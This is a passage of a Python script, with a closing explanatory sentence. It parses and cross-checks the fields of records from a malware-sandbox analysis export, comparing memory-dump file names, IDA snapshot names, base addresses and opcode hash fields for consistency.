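    """Collect the bullet fields of one record into a dict; empty values stay ''."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields


def parse_source_file(value):
    """Split the 'Source File' value into PID, dump index, base address and offset."""
    m = SOURCE_RE.match(value)
    if not m:
        raise ValueError("unrecognised Source File field: %r" % value)
    parts = m.group("name")[: -len(".sdmp")].split(".")
    # ASSUMPTION (inferred from this page): field 0 is the PID in hex,
    # field 1 the dump index, field 3 the base address of the dump.
    return {
        "pid": int(parts[0], 16),
        "dump_index": int(parts[1], 16),
        "base": int(parts[3], 16),
        "offset": int(m.group("offset"), 16),
        "based_on_pe": m.group("pe").lower() == "true",
    }


def parse_snapshot_file(value):
    """Split the IDA plugin snapshot name (assumed hcaresult_<pid>_<dump>_<base>_<image>.jbxd)."""
    m = SNAPSHOT_RE.match(value)
    if not m:
        raise ValueError("unrecognised Snapshot File field: %r" % value)
    return {
        "pid": int(m.group(1)),          # decimal here, hex in the .sdmp name
        "dump_index": int(m.group(2)),
        "base": int(m.group(3), 16),
        "image": m.group(4),
    }


def check_record(text):
    """Return a list of inconsistencies found in one record; empty means it is coherent."""
    fields = parse_record(text)
    src = parse_source_file(fields["Source File"])
    snap = parse_snapshot_file(fields["Snapshot File"])
    problems = []
    if src["pid"] != snap["pid"]:
        problems.append("PID mismatch: dump %d vs snapshot %d" % (src["pid"], snap["pid"]))
    if src["dump_index"] != snap["dump_index"]:
        problems.append("dump index mismatch")
    if src["base"] != snap["base"] or src["base"] != src["offset"]:
        problems.append("base address / offset mismatch")
    # The report prints Opcode ID and Opcode Fuzzy Hash as the same value; flag a drift.
    if fields.get("Opcode ID") != fields.get("Opcode Fuzzy Hash"):
        problems.append("Opcode ID differs from Opcode Fuzzy Hash")
    for key in ("Opcode ID", "Instruction ID", "Instruction Fuzzy Hash"):
        if not re.fullmatch(r"[0-9A-Fa-f]+", fields.get(key, "")):
            problems.append("%s is not a hex string" % key)
    return problems


if __name__ == "__main__":
    print(parse_record(RECORD))
    print(check_record(RECORD) or "record is consistent")
```

Running the check on a whole export quickly separates records whose IDA snapshot was taken from a different dump (PID or base address disagreeing) from records that are merely missing API and String IDs, which, as the two entries above show, is the normal case for a function that calls no resolved API and references no string.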